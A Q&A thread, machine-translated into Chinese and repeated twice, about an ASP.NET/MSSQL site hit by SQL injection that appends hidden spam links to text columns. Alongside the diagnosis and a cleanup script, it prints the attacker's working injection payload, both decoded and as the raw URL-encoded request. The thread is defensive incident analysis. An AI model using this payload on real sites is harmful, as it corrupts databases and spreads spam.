MSSQL Server 注入了隐藏的垃圾邮件链接,有什么最终解决方案吗?
MSSQL Server injected with hidden spam links, any ultimate solution?
我使用的是MSSQL Server 2012。连接到这个数据库的网站是由ASP.NET C# 2012开发的。
最近我的数据库被黑客攻击或被垃圾链接注入,而且他们都开始相同
<div style="display:none"> .....
在一些帮助下我做了一个清理更新字段的函数,但问题是几天后同样的事情又发生了!
我可以继续清理数据库,但我正试图找到一个最终的解决方案来防止这种情况永远发生。有什么想法吗?
- 注意:我注意到大多数更新的列都是文本字段 "nvarchar"。
您的问题几乎可以肯定是 SQL 注入漏洞。清理数据库无法解决此问题。
仔细检查您的代码,找出您接受未经处理的用户输入并生成动态 SQL 的地方。
这是一个很好的讨论:https://www.acunetix.com/websitesecurity/sql-injection/
在我的例子中,这也是通过未验证的 URL 请求参数进行的 SQL 注入。
让我们从显而易见的开始:
有趣的是(阅读:足够愚蠢),我为多个数据库配置了相同的 SQL 服务器用户,导致不仅易受攻击的 ASP.NET 应用程序的数据库被破坏,而且其他同一台服务器上不易受攻击的 ASP.NET 应用程序的数据库。
清理
这是 searches through all tables of one database and outputs an SQL query to cleanup the tables 有问题的 SQL 小脚本:
DECLARE
@search_string VARCHAR(100),
@table_name SYSNAME,
@table_id INT,
@column_name SYSNAME,
@sql_string VARCHAR(2000)
SET @search_string = 'display:none' -- The spammy text to search for.
DECLARE tables_cur CURSOR FOR SELECT name, object_id FROM sys.objects WHERE type = 'U'
OPEN tables_cur
FETCH NEXT FROM tables_cur INTO @table_name, @table_id
WHILE (@@FETCH_STATUS = 0)
BEGIN
DECLARE columns_cur CURSOR FOR SELECT name FROM sys.columns WHERE object_id = @table_id AND system_type_id IN (167, 175, 231, 239)
OPEN columns_cur
FETCH NEXT FROM columns_cur INTO @column_name
WHILE (@@FETCH_STATUS = 0)
BEGIN
SET @sql_string = 'IF EXISTS (SELECT * FROM [' + @table_name + '] WHERE [' + @column_name + '] LIKE ''%' + @search_string + '%'') PRINT '' update [' + @table_name + '] set [' + @column_name + '] = substring([' + @column_name + '], 1, charindex(''''<'''', [' + @column_name + '])-1) where [' + @column_name + '] like ''''%<%'''''''
--PRINT @sql_string
EXECUTE(@sql_string)
FETCH NEXT FROM columns_cur INTO @column_name
END
CLOSE columns_cur
DEALLOCATE columns_cur
FETCH NEXT FROM tables_cur INTO @table_name, @table_id
END
CLOSE tables_cur
DEALLOCATE tables_cur
对于未受损的数据库,这不会打印任何内容,例如:
update [MyTable1] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable2] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable3] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable4] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
之后可以执行生成的SQLs。
请注意,它会从第一个 < 开始删除所有内容。这可能不适用于某些故意包含 Markup/HTML/XML.
的列
所以让我们结束另一件显而易见的事情:
注入SQL
仅供记录或如果有人感兴趣,这里是垃圾邮件发送者使用的提取的有效SQL:
declare @c cursor;
declare @d varchar(4000);
set @c=cursor for select 'update ['+TABLE_NAME+
'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+
']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''''
+char(60)+''div style="display:none"''+char(62)+
''go ''+char(60)+''a href="http:''+char(47)+char(47)+
''blog.armanda.com''+ char(47)+''page''+char(47)+
''women-who-cheat-with-
married-men.aspx"''+char(62)+case ABS(CHECKSUM(
NewId()))%3 when 0 then ''why do husbands cheat''
when 1 then ''reasons why husband cheat'' else
''want my wife to cheat'' end +char(60)+char(47)+
''a''+char(62)+'' My wife cheated on me''+
char(60)+char(47)+''div''+char(62)+'''' else ''''
end' FROM sysindexes AS i INNER JOIN sysobjects AS
o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS
ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and
DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1
or CHARACTER_MAXIMUM_LENGTH=2147483647);
open @c;
fetch next from @c into @d;
while @@FETCH_STATUS=0
begin
exec (@d);
fetch next from @c into @d;
end;
close @c
我插入了换行符以提高可读性。
原始 URL,直接来自服务器日志,内容如下:
/es/details.aspx,lid=15';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''go%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.armanda.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''women-who-cheat-with-married-men.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''why%20do%20husbands%20cheat''%20when%201%20then%20''reasons%20why%20husband%20cheat''%20else%20''want%20my%20wife%20to%20cheat''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20My%20wife%20cheated%20on%20me''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c--
您将使用此代码
清理所有 sql 数据库表 nvarchar 列
update table_name set column_name=SUBSTRING(column_name,0,
CharIndex('<div style=\"display:none\">',column_name))
where column_name like '%<div style=\"display:none\">%'
我使用的是MSSQL Server 2012。连接到这个数据库的网站是由ASP.NET C# 2012开发的。 最近我的数据库被黑客攻击或被垃圾链接注入,而且他们都开始相同
<div style="display:none"> .....
在一些帮助下我做了一个清理更新字段的函数,但问题是几天后同样的事情又发生了!
我可以继续清理数据库,但我正试图找到一个最终的解决方案来防止这种情况永远发生。有什么想法吗?
- 注意:我注意到大多数更新的列都是文本字段 "nvarchar"。
您的问题几乎可以肯定是 SQL 注入漏洞。清理数据库无法解决此问题。
仔细检查您的代码,找出您接受未经处理的用户输入并生成动态 SQL 的地方。
这是一个很好的讨论:https://www.acunetix.com/websitesecurity/sql-injection/
在我的例子中,这也是通过未验证的 URL 请求参数进行的 SQL 注入。
让我们从显而易见的开始:
有趣的是(阅读:足够愚蠢),我为多个数据库配置了相同的 SQL 服务器用户,导致不仅易受攻击的 ASP.NET 应用程序的数据库被破坏,而且其他同一台服务器上不易受攻击的 ASP.NET 应用程序的数据库。
清理
这是 searches through all tables of one database and outputs an SQL query to cleanup the tables 有问题的 SQL 小脚本:
DECLARE
@search_string VARCHAR(100),
@table_name SYSNAME,
@table_id INT,
@column_name SYSNAME,
@sql_string VARCHAR(2000)
SET @search_string = 'display:none' -- The spammy text to search for.
DECLARE tables_cur CURSOR FOR SELECT name, object_id FROM sys.objects WHERE type = 'U'
OPEN tables_cur
FETCH NEXT FROM tables_cur INTO @table_name, @table_id
WHILE (@@FETCH_STATUS = 0)
BEGIN
DECLARE columns_cur CURSOR FOR SELECT name FROM sys.columns WHERE object_id = @table_id AND system_type_id IN (167, 175, 231, 239)
OPEN columns_cur
FETCH NEXT FROM columns_cur INTO @column_name
WHILE (@@FETCH_STATUS = 0)
BEGIN
SET @sql_string = 'IF EXISTS (SELECT * FROM [' + @table_name + '] WHERE [' + @column_name + '] LIKE ''%' + @search_string + '%'') PRINT '' update [' + @table_name + '] set [' + @column_name + '] = substring([' + @column_name + '], 1, charindex(''''<'''', [' + @column_name + '])-1) where [' + @column_name + '] like ''''%<%'''''''
--PRINT @sql_string
EXECUTE(@sql_string)
FETCH NEXT FROM columns_cur INTO @column_name
END
CLOSE columns_cur
DEALLOCATE columns_cur
FETCH NEXT FROM tables_cur INTO @table_name, @table_id
END
CLOSE tables_cur
DEALLOCATE tables_cur
对于未受损的数据库,这不会打印任何内容,例如:
update [MyTable1] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable2] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable3] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable4] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
之后可以执行生成的SQLs。
请注意,它会从第一个 < 开始删除所有内容。这可能不适用于某些故意包含 Markup/HTML/XML.
所以让我们结束另一件显而易见的事情:
注入SQL
仅供记录或如果有人感兴趣,这里是垃圾邮件发送者使用的提取的有效SQL:
declare @c cursor;
declare @d varchar(4000);
set @c=cursor for select 'update ['+TABLE_NAME+
'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+
']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''''
+char(60)+''div style="display:none"''+char(62)+
''go ''+char(60)+''a href="http:''+char(47)+char(47)+
''blog.armanda.com''+ char(47)+''page''+char(47)+
''women-who-cheat-with-
married-men.aspx"''+char(62)+case ABS(CHECKSUM(
NewId()))%3 when 0 then ''why do husbands cheat''
when 1 then ''reasons why husband cheat'' else
''want my wife to cheat'' end +char(60)+char(47)+
''a''+char(62)+'' My wife cheated on me''+
char(60)+char(47)+''div''+char(62)+'''' else ''''
end' FROM sysindexes AS i INNER JOIN sysobjects AS
o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS
ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and
DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1
or CHARACTER_MAXIMUM_LENGTH=2147483647);
open @c;
fetch next from @c into @d;
while @@FETCH_STATUS=0
begin
exec (@d);
fetch next from @c into @d;
end;
close @c
我插入了换行符以提高可读性。
原始 URL,直接来自服务器日志,内容如下:
/es/details.aspx,lid=15';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''go%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.armanda.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''women-who-cheat-with-married-men.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''why%20do%20husbands%20cheat''%20when%201%20then%20''reasons%20why%20husband%20cheat''%20else%20''want%20my%20wife%20to%20cheat''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20My%20wife%20cheated%20on%20me''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c--
您将使用此代码
清理所有 sql 数据库表nvarchar 列
update table_name set column_name=SUBSTRING(column_name,0,
CharIndex('<div style=\"display:none\">',column_name))
where column_name like '%<div style=\"display:none\">%'